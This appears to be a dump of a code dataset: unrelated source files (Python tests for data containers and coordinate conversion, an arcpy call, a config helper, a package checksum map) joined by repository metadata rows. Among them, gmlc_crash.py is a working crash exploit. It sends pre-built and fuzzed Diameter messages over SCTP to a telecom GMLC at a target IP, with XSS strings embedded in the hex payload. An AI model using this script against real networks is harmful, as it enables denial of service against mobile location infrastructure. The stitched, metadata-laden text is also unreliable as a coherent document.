data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_2d, expected_outputs_2d = _create_data_source((10, 10))
data_inputs_1d, expected_outputs_1d = _create_data_source((10,))
data_container_1d = DACT(data_inputs=data_inputs_1d, expected_outputs=expected_outputs_1d)
data_container_2d = DACT(data_inputs=data_inputs_2d, expected_outputs=expected_outputs_2d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_2d, data_container_1d)
assert zip_data_container.ids == data_container.ids
for i, di in enumerate(zip_data_container.data_inputs):
assert np.array_equal(di[0], data_inputs_3d[i])
assert np.array_equal(di[1], data_inputs_2d[i])
def test_zip_data_container_should_concatenate_inner_features():
data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_2d, expected_outputs_2d = _create_data_source((10, 10))
data_container_2d = DACT(data_inputs=data_inputs_2d, expected_outputs=expected_outputs_2d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_2d)
zip_data_container.concatenate_inner_features()
assert np.array_equal(np.array(zip_data_container.data_inputs)[..., -1], data_container_2d.data_inputs)
assert np.array_equal(np.array(zip_data_container.expected_outputs), expected_outputs_3d)
def _create_data_source(shape):
data_inputs = np.random.random(shape).astype(np.float32)
expected_outputs = np.random.random(shape).astype(np.float32)
return data_inputs, expected_outputs
| 50.328358
| 107
| 0.803084
| 501
| 3,372
| 4.904192
| 0.097804
| 0.21164
| 0.110704
| 0.1221
| 0.899471
| 0.882377
| 0.878307
| 0.836793
| 0.820513
| 0.787139
| 0
| 0.034471
| 0.113879
| 3,372
| 66
| 108
| 51.090909
| 0.787818
| 0
| 0
| 0.659574
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 1
| 0.106383
| false
| 0
| 0.042553
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68bdbb59570f4f0d101b0a9879502d39cefedf15
| 2,664
|
py
|
Python
|
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | 1
|
2022-02-07T13:39:55.000Z
|
2022-02-07T13:39:55.000Z
|
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | null | null | null |
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | 1
|
2021-11-01T22:51:15.000Z
|
2021-11-01T22:51:15.000Z
|
#!/usr/bin/env python
# gmlc_crash.py <target_ip>
# Sends pre-built Diameter-over-SCTP messages (3GPP SLg interface) to a GMLC
# on port 3868 to reproduce a crash. Payloads are raw hex blobs; do not edit.
import socket
import sctp
import binascii
import sys
import time
# To test locally: sudo ncat --sctp -l -p 3868
# source ip 192.168.113.212 # acting as an MME client. IP used: IP A
# destination 192.168.113.210 ~ GMLC IP
# AVP Origin-Host: pta123_mme.tim.it
# AVP Origin-Realm: tim.it
# interface: 3GPP SLg
# Load the SCTP kernel modules first if they are not already present:
# sudo insmod /lib/modules/3.6.11-4.fc16.i686/kernel/lib/libcrc32c.ko
# sudo insmod /lib/modules/3.6.11-4.fc16.i686/kernel/net/sctp/sctp.ko
# echo 1 > /proc/sys/net/sctp/max_init_retransmits
ip = sys.argv[1]  # target host taken from the first CLI argument
s = sctp.sctpsocket_tcp(socket.AF_INET)  # one-to-one (TCP-style) SCTP socket
s.connect((str(ip),3868))  # 3868 = Diameter default port
# First message: Capabilities-Exchange-Request (Origin-Host/Realm AVPs above).
s.send(binascii.unhexlify("010000a0800001010000000034d1cff80011779f00000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e697400000000010d0000000b50544100000001014000000e0001c0a871d400000000010a4000000c000028af000001094000000c000028af000001024000000c0100002700000104400000200000010a4000000c000028af000001024000000c01000027"))
time.sleep(1)
# 222015703526741
# 2922107530257614
# frame 16138 pcap gmlc fuzzy
# Second message: fuzzed request captured from a pcap (frame 16138).
s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
time.sleep(10)
# Optional repeats of the fuzzed message, kept disabled:
#s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
#time.sleep(5)
#s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
#time.sleep(20)
s.close()
| 76.114286
| 527
| 0.915916
| 155
| 2,664
| 15.709677
| 0.548387
| 0.008214
| 0.021355
| 0.03614
| 0.681314
| 0.681314
| 0.681314
| 0.032033
| 0.032033
| 0.032033
| 0
| 0.67236
| 0.033033
| 2,664
| 34
| 528
| 78.352941
| 0.272904
| 0.585586
| 0
| 0
| 0
| 0
| 0.751381
| 0.751381
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.384615
| 0
| 0.384615
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ec1fc8bc62df8fff4b2d66b7fad582e61efb74bf
| 36
|
py
|
Python
|
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
# Import-time side effect: announce which submodule was loaded (demo of
# Python's package import mechanics for sound/effects/surround).
print('sound/effects/surround.py')
| 12
| 34
| 0.75
| 5
| 36
| 5.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 36
| 2
| 35
| 18
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ec52b6b7bc8084e3a1aa6161a629378a95535a1f
| 161
|
py
|
Python
|
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
import arcpy
# Convert build.e00 (ArcInfo interchange file) into a coverage named "build2".
# ImportFromE00_conversion(input_e00_file, output_folder, output_coverage_name)
arcpy.ImportFromE00_conversion("M:/Python_Advanced/L2/build.e00", "M:/Python_Advanced/L2/", "build2")
| 26.833333
| 102
| 0.745342
| 23
| 161
| 5.086957
| 0.695652
| 0.136752
| 0.25641
| 0.290598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062937
| 0.111801
| 161
| 5
| 103
| 32.2
| 0.755245
| 0.229814
| 0
| 0
| 0
| 0
| 0.504274
| 0.452991
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6be581a6f6777f0f4c42bdba2a2c97ad38d136e3
| 3,086
|
py
|
Python
|
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
"""SimpleConf works to combine some dictionary of options (likely from argparse)...
with the get method from FHConfParser to provide a very simple solution to enable
a user to extend the capabilities of FHConfParser such that command-line arguments
can be used to override config options
Example use:
```python
import argparse
from fhconfparser import FHConfParser, SimpleConf
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
parser.add_argument(
"--file",
"-o",
help="Filename to write to (omit for stdout)",
)
...
parser.add_argument(
"--zero",
"-0",
help="Return non zero exit code if an incompatible license is found",
action="store_true",
)
args = vars(parser.parse_args())
# ConfigParser (Parses in the following order: `pyproject.toml`, `setup.cfg`
configparser = FHConfParser()
configparser.parseConfigList(
[("pyproject.toml", "toml"), ("setup.cfg", "ini")],
["tool"],
["tool"],
)
sc = SimpleConf(configparser, "licensecheck", args)
sc.get("zero", False) # Provide the actual default here (used if not provided
# from the command line or through a config file)
```
"""
from __future__ import annotations
from typing import Any
import attr
from .fhconfparser import FHConfParser
@attr.s(auto_attribs=True)
class SimpleConf:
    """Layer command-line options on top of FHConfParser lookups.

    Combines a dictionary of options (typically ``vars(parser.parse_args())``
    from an ``argparse.ArgumentParser(argument_default=argparse.SUPPRESS)``)
    with the ``get`` method of an :class:`FHConfParser`, so that command-line
    arguments override values read from config files such as
    ``pyproject.toml`` or ``setup.cfg``.

    Attributes:
        configParser (FHConfParser): parsed configuration to fall back on.
        section (str): config section queried on every lookup.
        args (dict[str, Any]): command-line options; a present key always wins.

    Example:
        ``sc = SimpleConf(configparser, "licensecheck", args)`` then
        ``sc.get("zero", False)`` — pass the real default to ``get`` (used when
        the option comes from neither the command line nor a config file).
    """

    configParser: FHConfParser
    section: str
    args: dict[str, Any]

    def get(self, option: str, fallback: Any | None = None) -> Any:
        """Get an option from the command line or, failing that, the config.

        Args:
            option (str): option name.
            fallback (Optional[Any]): value returned when neither source
                provides the option. Default=None

        Returns:
            Any: the command-line value when present, otherwise the config
            value (or *fallback*).
        """
        fromConfig = self.configParser.get(self.section, option, fallback)
        return self.args.get(option, fromConfig)
| 26.834783
| 84
| 0.726183
| 410
| 3,086
| 5.426829
| 0.285366
| 0.035955
| 0.030562
| 0.045843
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0
| 0.000772
| 0.160402
| 3,086
| 114
| 85
| 27.070175
| 0.85797
| 0.925794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6be610dd7013ec1938df68e71e5165e62dab9e14
| 118
|
bzl
|
Python
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 39
|
2021-06-18T03:22:30.000Z
|
2022-03-21T15:23:43.000Z
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 10
|
2021-06-18T03:22:19.000Z
|
2022-03-18T22:14:15.000Z
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 4
|
2021-08-19T19:20:04.000Z
|
2022-03-08T07:33:18.000Z
|
# Debian package filename -> SHA-256 checksum, consumed by the rsync
# package-fetch rules.
files = {
    "rsync_3.1.2-1+deb9u2_amd64.deb": "f2987623a6e5b5aedf56e679bedd2e6f7d54cdb4815ac4149c4d135da16ff9c2",
}
| 29.5
| 105
| 0.79661
| 10
| 118
| 9.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.407407
| 0.084746
| 118
| 3
| 106
| 39.333333
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0.79661
| 0.79661
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4079c155c93561cece981d47148c50bd196d84a
| 104
|
py
|
Python
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 15
|
2020-03-17T15:43:46.000Z
|
2022-01-08T04:23:49.000Z
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 5
|
2020-03-12T10:05:27.000Z
|
2021-03-03T16:01:47.000Z
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 2
|
2020-03-17T17:09:20.000Z
|
2020-12-28T22:59:17.000Z
|
from sites.nethz.producer import producer, get_folder_name
from .get_website_url import get_website_url
| 34.666667
| 58
| 0.875
| 17
| 104
| 5
| 0.588235
| 0.235294
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086538
| 104
| 2
| 59
| 52
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d410d1326e3243595f2ec62e1122d56a7cc28191
| 75
|
py
|
Python
|
toolkit/routes/keywords/__init__.py
|
salonimalhotra-ui/seo-audits-toolkit
|
99af8b53dffad45f679eaf06b4a8080df75fcd72
|
[
"MIT"
] | 1
|
2020-12-21T18:21:34.000Z
|
2020-12-21T18:21:34.000Z
|
toolkit/routes/keywords/__init__.py
|
x0rzkov/seo-audits-toolkit
|
29994cbab51bd0697c717b675df3c176096e4f03
|
[
"MIT"
] | null | null | null |
toolkit/routes/keywords/__init__.py
|
x0rzkov/seo-audits-toolkit
|
29994cbab51bd0697c717b675df3c176096e4f03
|
[
"MIT"
] | null | null | null |
import toolkit.routes.keywords.api
import toolkit.routes.keywords.dashboard
| 37.5
| 40
| 0.88
| 10
| 75
| 6.6
| 0.6
| 0.393939
| 0.575758
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 75
| 2
| 40
| 37.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d471ef07a6cf8492006fa2287757ba76d3960154
| 7,786
|
py
|
Python
|
tests/test_convert.py
|
TeriForey/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | null | null | null |
tests/test_convert.py
|
TeriForey/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | 1
|
2020-07-03T17:39:08.000Z
|
2020-07-03T17:39:08.000Z
|
tests/test_convert.py
|
UniOfLeicester/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | null | null | null |
import pytest
from plotdarn import convert
from plotdarn.locations import north_pole
from datetime import datetime
import numpy as np
# Expected conversion results for `north_pole` at 2012-06-15 22:02 (see the
# tests below): geographic (G) and magnetic (M) latitude/longitude in degrees.
NP_GLAT = 82.82981033739065
NP_GLON = -84.21565686001807
NP_MLAT = 83.73564264222507
NP_MLON = 169.7596236665287
def test_convert_single():
    # Magnetic -> geographic for a single location, time given as a datetime.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    newloc = convert.loc_mag_to_geo(north_pole, time)
    assert newloc.lat == NP_GLAT
    assert newloc.lon == NP_GLON


def test_convert_single_not_a_loc():
    # A bare [lat, lon] list has no .lat/.lon attributes -> AttributeError.
    with pytest.raises(AttributeError):
        convert.loc_mag_to_geo([20, 30], "2012-06-15 22:02")


def test_convert_single_not_a_datetime():
    # A date string is parsed and gives the same result as the datetime above.
    time = "2012-06-15 22:02"
    res = convert.loc_mag_to_geo(north_pole, time)
    assert res.lat == NP_GLAT
    assert res.lon == NP_GLON


def test_convert_single_strdate_timezone():
    # A trailing 'Z' (UTC) suffix on the date string is accepted too.
    time = "2012-06-15 22:02Z"
    res = convert.loc_mag_to_geo(north_pole, time)
    assert res.lat == NP_GLAT
    assert res.lon == NP_GLON


def test_convert_single_unknown_date():
    # An unparseable date string raises ValueError.
    time = "This can't be a time"
    with pytest.raises(ValueError):
        convert.loc_mag_to_geo(north_pole, time)
def test_convert_array():
    # Array form: one lat/lon pair in, stacked [[lats], [lons]] out.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    res = convert.arr_mag_to_geo([north_pole.lat], [north_pole.lon], time)
    np.testing.assert_array_equal(res, np.array([[NP_GLAT], [NP_GLON]]))


def test_convert_array_2vals():
    # Two identical points convert to two identical results, order preserved.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    res = convert.arr_mag_to_geo([north_pole.lat, north_pole.lat], [north_pole.lon, north_pole.lon], time)
    expected = np.array(
        [
            [NP_GLAT, NP_GLAT],
            [NP_GLON, NP_GLON]
        ]
    )
    np.testing.assert_array_equal(res, expected)


def test_convert_array_np_input():
    # Numpy arrays are accepted in place of plain lists.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    input_lat = np.array([north_pole.lat, north_pole.lat])
    input_lon = np.array([north_pole.lon, north_pole.lon])
    res = convert.arr_mag_to_geo(input_lat, input_lon, time)
    expected = np.array(
        [
            [NP_GLAT, NP_GLAT],
            [NP_GLON, NP_GLON]
        ]
    )
    np.testing.assert_array_equal(res, expected)


def test_convert_array_single_input():
    # Scalars instead of sequences are rejected with TypeError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    with pytest.raises(TypeError):
        convert.arr_mag_to_geo(north_pole.lat, north_pole.lon, time)


def test_convert_array_uneven():
    # Mismatched lat/lon lengths are rejected with ValueError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    with pytest.raises(ValueError):
        convert.arr_mag_to_geo([north_pole.lat, north_pole.lat], [north_pole.lon], time)


def test_convert_array_np_input_shape():
    # 2-D (column-shaped) input arrays are rejected with ValueError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    input_lat = np.array([[north_pole.lat], [north_pole.lat]])
    input_lon = np.array([[north_pole.lon], [north_pole.lon]])
    with pytest.raises(ValueError):
        convert.arr_mag_to_geo(input_lat, input_lon, time)
# Reverse direction: geographic -> magnetic ("g2m") mirrors of the tests above.
def test_convert_geo_to_mag_loc():
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    newloc = convert.loc_geo_to_mag(north_pole, time)
    assert newloc.lat == NP_MLAT
    assert newloc.lon == NP_MLON


def test_convert_single_g2m_not_a_loc():
    # A bare [lat, lon] list has no .lat/.lon attributes -> AttributeError.
    with pytest.raises(AttributeError):
        convert.loc_geo_to_mag([20, 30], "2012-06-15 22:02")


def test_convert_single_g2m_not_a_datetime():
    # A date string is accepted in place of a datetime.
    time = "2012-06-15 22:02"
    res = convert.loc_geo_to_mag(north_pole, time)
    assert res.lat == NP_MLAT
    assert res.lon == NP_MLON


def test_convert_single_g2m_strdate_timezone():
    # A trailing 'Z' (UTC) suffix on the date string is accepted too.
    time = "2012-06-15 22:02Z"
    res = convert.loc_geo_to_mag(north_pole, time)
    assert res.lat == NP_MLAT
    assert res.lon == NP_MLON


def test_convert_single_g2m_unknown_date():
    # An unparseable date string raises ValueError.
    time = "This can't be a time"
    with pytest.raises(ValueError):
        convert.loc_geo_to_mag(north_pole, time)


def test_convert_g2m_array():
    # Array form: one lat/lon pair in, stacked [[lats], [lons]] out.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    res = convert.arr_geo_to_mag([north_pole.lat], [north_pole.lon], time)
    np.testing.assert_array_equal(res, np.array([[NP_MLAT], [NP_MLON]]))


def test_convert_array_g2m_2vals():
    # Two identical points convert to two identical results, order preserved.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    res = convert.arr_geo_to_mag([north_pole.lat, north_pole.lat], [north_pole.lon, north_pole.lon], time)
    expected = np.array(
        [
            [NP_MLAT, NP_MLAT],
            [NP_MLON, NP_MLON]
        ]
    )
    np.testing.assert_array_equal(res, expected)


def test_convert_array_g2m_np_input():
    # Numpy arrays are accepted in place of plain lists.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    input_lat = np.array([north_pole.lat, north_pole.lat])
    input_lon = np.array([north_pole.lon, north_pole.lon])
    res = convert.arr_geo_to_mag(input_lat, input_lon, time)
    expected = np.array(
        [
            [NP_MLAT, NP_MLAT],
            [NP_MLON, NP_MLON]
        ]
    )
    np.testing.assert_array_equal(res, expected)


def test_convert_array_g2m_single_input():
    # Scalars instead of sequences are rejected with TypeError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    with pytest.raises(TypeError):
        convert.arr_geo_to_mag(north_pole.lat, north_pole.lon, time)


def test_convert_array_g2m_uneven():
    # Mismatched lat/lon lengths are rejected with ValueError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    with pytest.raises(ValueError):
        convert.arr_geo_to_mag([north_pole.lat, north_pole.lat], [north_pole.lon], time)


def test_convert_array_g2m_np_input_shape():
    # 2-D (column-shaped) input arrays are rejected with ValueError.
    time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
    input_lat = np.array([[north_pole.lat], [north_pole.lat]])
    input_lon = np.array([[north_pole.lon], [north_pole.lon]])
    with pytest.raises(ValueError):
        convert.arr_geo_to_mag(input_lat, input_lon, time)
# xy_angle_to_origin(x, y, angle) tests: given a point and an angle, the
# result is the angle re-expressed relative to the origin, one quadrant per
# test group below (expected values are spelled out in the inline comments).
def test_convert_angle_180():
    x = 2
    y = 2
    angle = 180
    res = convert.xy_angle_to_origin(x, y, angle)
    assert res == 45


def test_convert_angle_minus180():
    # -180 and 180 are the same direction, so the result matches the above.
    res = convert.xy_angle_to_origin(2, 2, -180)
    assert res == 45


def test_convert_angle_1xy_180():
    # Result depends on direction, not distance: (1, 1) behaves like (2, 2).
    res = convert.xy_angle_to_origin(1, 1, 180)
    assert res == 45


def test_convert_angle_160():
    res = convert.xy_angle_to_origin(2, 2, 160)
    assert res == 65


def test_convert_angle_minus160():
    res = convert.xy_angle_to_origin(2, 2, -160)
    assert res == 25


def test_convert_angle_0():
    res = convert.xy_angle_to_origin(2, 2, 0)
    assert res == 225 # (180 + 45)


def test_convert_left_quad_180():
    res = convert.xy_angle_to_origin(-2, 2, 180)
    assert res == 135 # 90 + 45


def test_convert_left_quad_160():
    res = convert.xy_angle_to_origin(-2, 2, 160)
    assert res == 155 # 90 + 65


def test_convert_bottom_left_quad_180():
    res = convert.xy_angle_to_origin(-2, -2, 180)
    assert res == 225 # 180 + 45


def test_convert_bottom_left_quad_minus160():
    res = convert.xy_angle_to_origin(-2, -2, -160)
    assert res == 205 # 180 + 25


def test_convert_bottom_left_quad_0():
    res = convert.xy_angle_to_origin(-2, -2, 0)
    assert res == 45


def test_convert_bottom_right_quad_180():
    res = convert.xy_angle_to_origin(2, -2, 180)
    assert res == 315 # 180 + 90 + 45


def test_convert_bottom_right_quad_160():
    res = convert.xy_angle_to_origin(2, -2, 160)
    assert res == 335 # 180 + 90 + 65


def test_convert_bottom_right_quad_minus160():
    res = convert.xy_angle_to_origin(2, -2, -160)
    assert res == 295 # 180 + 90 + 25


def test_convert_bottom_right_quad_0():
    res = convert.xy_angle_to_origin(2, -2, 0)
    assert res == 135 # 90 + 45


def test_convert_angle_array():
    # Vectorized: element-wise results match the scalar cases above.
    x = np.array([2, 2, 1])
    y = np.array([2, -2, 1])
    angle = np.array([180, 180, 0])
    res = convert.xy_angle_to_origin(x, y, angle)
    np.testing.assert_array_almost_equal(res, np.array([45, 315, 225]))
| 29.381132
| 106
| 0.685975
| 1,254
| 7,786
| 3.949761
| 0.083732
| 0.085403
| 0.10741
| 0.054916
| 0.90955
| 0.888754
| 0.859681
| 0.825358
| 0.776499
| 0.733697
| 0
| 0.081222
| 0.1888
| 7,786
| 264
| 107
| 29.492424
| 0.702977
| 0.012073
| 0
| 0.406417
| 0
| 0
| 0.017964
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.203209
| false
| 0
| 0.026738
| 0
| 0.229947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e07ce6f32ff7d86e5b5c905826cf995185762b9
| 41
|
py
|
Python
|
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
from japan_address.japan_address import *
| 41
| 41
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e0a1ae69c776acb2302e78acb924cc421289fa3
| 17,632
|
py
|
Python
|
tests/test_util.py
|
constrict0r/unify
|
18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | 2
|
2019-08-14T08:51:50.000Z
|
2020-01-27T08:42:35.000Z
|
tests/test_util.py
|
constrict0r/unify
|
